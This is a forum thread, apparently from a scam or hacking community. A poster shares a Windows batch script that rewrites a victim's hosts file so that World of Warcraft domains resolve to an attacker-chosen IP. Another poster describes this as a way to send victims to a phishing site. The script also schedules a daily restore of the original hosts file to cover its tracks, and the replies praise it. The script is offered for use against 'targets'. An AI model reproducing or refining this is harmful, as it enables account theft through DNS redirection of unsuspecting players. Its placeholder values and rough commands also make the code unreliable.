EPIX Bro! +Rep cookies for you.
This is a fix to PH1r's scam.
If remember correctly the code he wrote was:
@echo off
echo IP.Address worldofwarcraft.com >> %SystemRoot%\system32\drivers\etc\hosts
echo IP.Address World of Warcraft Community Site >> %SystemRoot%\system32\drivers\etc\hosts
Well that is perfect although we had someone point out that the host file is f***d forever unless they change it back....not quite
If ph1r was a true programmer he would definitely be aware of the
'at' command in command prompt.
Seriously
Just change the above code to the following
@echo off
cd %SystemRoot%\system32\drivers\etc
md host1
copy %SystemRoot%\system32\drivers\etc\hosts host1
echo IP.Address worldofwarcraft.com >> %SystemRoot%\system32\drivers\etc\hosts
echo IP.Address World of Warcraft Community Site >> %SystemRoot%\system32\drivers\etc\hosts
at 18:00 /every:M,T,W,TH,F,S,SA copy %SystemRoot%\system32\drivers\etc\host1\hosts
%SystemRoot%\system32\drivers\etc
And if I have it right, then it
- Create a folder called host1
- copy the host file to host1
- edit the original host file
- then set a schedule to copy back the original host file every day at 6pm
Just save that in a txt file and 'Save As..' *filename*.bat
That way the hostfile is fixed very soon after your target has been owned![]()
er... I think there maybe one or two tweaks to be made but its 6 am and I'm exhausted, been working late tonght so...I am exhausted.
Anyway
Let me know if there is anything wrong with that
Regards,
iTerrorist
EPIX Bro! +Rep cookies for you.
Immortal GamerZ Under Development!
I didnt understand a word you said, love it! +Rep for the effort.
Epic very cool thx RWAAAARRR amazing xD 2 +Rep
very epic thanks![]()
I have not really understood what's the point exactly.
It makes it so whenever the person goes to WorldofWarcraft.com it instead goes to your phishing site, I think?
This doesn't work unless you have a dedicated ip for your host... Jezus christ, anyone actually tried this before giving rep? (for repost #21543241242)